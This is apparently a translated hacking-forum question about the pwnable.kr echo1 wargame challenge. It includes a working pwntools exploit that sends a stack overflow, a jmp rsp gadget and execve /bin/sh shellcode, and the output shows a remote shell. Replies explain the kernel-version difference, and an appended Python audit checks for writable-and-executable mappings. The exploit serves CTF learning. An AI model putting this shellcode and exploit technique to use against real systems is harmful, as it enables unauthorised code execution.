System Hacking

   turttle2s
pwnable.kr echo1 question 2 (spoiler warning)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2011


Previous post: http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2000

Earlier I posted a question because I couldn't understand echo1 even after reading the write-up, but it didn't get resolved, so I said I'd look at it again later and moved on.

Now I'm looking at the echo1 problem again, and I still don't understand it.

Clearly an overflow occurs in echo1, and NX is not applied, so it looks like a problem where you execute shellcode. The key question is how to get it to execute; looking at the write-up, it stores the opcode of jmp rsp (\xff\xe4) in the id area and then executes that. (rsp points to the shellcode.)

The problem is that the id area has no execute permission, so even if the opcode is stored there, it cannot be executed.
So even if I set rip to id, a SIGSEGV occurs as soon as it tries to execute. Locally, that is.
But when I run it remotely, it works fine? It's a bit confusing; what am I missing..

[Debugging info]

(gdb) info proc
process 165283
cmdline = '/home/ubuntu/ctf/echo1'
cwd = '/home/ubuntu/ctf'
exe = '/home/ubuntu/ctf/echo1'


(gdb) !cat /proc/165283/maps
00400000-00401000 r-xp 00000000 ca:01 785621                             /home/ubuntu/ctf/echo1
00601000-00602000 r--p 00001000 ca:01 785621                             /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621                             /home/ubuntu/ctf/echo1   // no execute permission here
(omitted)
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0                          [stack]   // execute permission here
(omitted)


(gdb) p &id
$2 = (<data variable, no debug info> *) 0x6020a0 <id>


[Exploit code]
from pwn import *

#e = ELF("./echo1")
jmp_rsp = b"\xff\xe4"
sc = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p = remote("pwnable.kr", 9010)
#p = process("./echo1")

name = jmp_rsp
name_addr = 0x6020a0
p.sendline(name)
print(p.recvuntil(b"> "))
p.sendline(b"1")        # 1. BOF

payload = b"a"*0x20 + b"b"*0x8   # buf + rbp
payload += p64(name_addr)   # ret
payload += sc
p.sendline(payload)

p.interactive()


[Execution result]
$ python echo1.py
[+] Opening connection to pwnable.kr on port 9010: Done
b"hey, what's your name? : \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> "
[*] Switching to interactive mode
hello \xff\xe4
$          aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb\xa0 `
goodbye \xff\xe4
$              id
uid=1053(echo1) gid=1053(echo1) groups=1053(echo1)

  Hit : 1135     Date : 2022/10/05 12:21



    
turttle2s https://ray3708.tistory.com/28

Apparently the data area actually does have execute permission as well, and the reason it isn't applied locally is a kernel version difference
2022/11/02
turttle2s I didn't think of logging into the challenge server to check it there 2022/11/02
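Added example (written for this page, not code from the post, the linked write-up, or pwnable.kr): a small Python audit that parses the /proc/PID/maps format quoted above, listing mappings that are writable and executable at once and telling whether a given address such as id (0x6020a0) sits in an executable mapping, plus a check of a binary's PT_GNU_STACK header, which is what makes the loader map the stack rwxp; on x86-64, kernels before 5.8 also set READ_IMPLIES_EXEC for such binaries so that every readable mapping, .data included, becomes executable, which is the kernel-version difference the comment above refers to. The maps sample is constructed from the lines in the post and the ELF image is a constructed minimal one.

```python
import re
import struct

# Constructed sample: the /proc/PID/maps lines quoted in the post above.
SAMPLE_MAPS = """\
00400000-00401000 r-xp 00000000 ca:01 785621 /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621 /home/ubuntu/ctf/echo1
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]
"""
MAPS_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) ([rwxps-]{4}) \S+ \S+ \S+\s*(.*)$")

def parse_maps(text):
    """(start, end, perms, path) for every mapping line in maps output."""
    found = (MAPS_RE.match(line) for line in text.splitlines())
    return [(int(m[1], 16), int(m[2], 16), m[3], m[4]) for m in found if m]

def wx_mappings(text):
    """Mappings that are writable and executable at once (W^X violations)."""
    return [m for m in parse_maps(text) if "w" in m[2] and "x" in m[2]]

def region_is_exec(text, addr):
    """True/False for the mapping containing addr, None if addr is unmapped."""
    for start, end, perms, _ in parse_maps(text):
        if start <= addr < end:
            return "x" in perms
    return None

PT_GNU_STACK, PF_X = 0x6474E551, 1
def gnu_stack_flags(elf):
    """p_flags of PT_GNU_STACK in a little-endian ELF64 image, None if absent."""
    e_phoff, = struct.unpack_from("<Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return p_flags
    return None

def stack_executable(elf):
    """The loader grants an executable stack when PT_GNU_STACK is absent or has PF_X."""
    flags = gnu_stack_flags(elf)
    return flags is None or bool(flags & PF_X)

def make_elf64(phdrs):
    """Constructed minimal ELF64 image holding only the given (p_type, p_flags) headers."""
    hdr = bytearray(64)
    hdr[:4], hdr[4], hdr[5] = b"\x7fELF", 2, 1       # magic, ELFCLASS64, little-endian
    struct.pack_into("<Q", hdr, 32, 64)              # e_phoff: headers follow the ELF header
    struct.pack_into("<HH", hdr, 54, 56, len(phdrs)) # e_phentsize, e_phnum
    return bytes(hdr) + b"".join(struct.pack("<II", t, f) + bytes(48) for t, f in phdrs)
```

Run parse_maps on the maps of a real process on both hosts to see which readable mappings carry x; readelf -l also shows the GNU_STACK line that stack_executable checks.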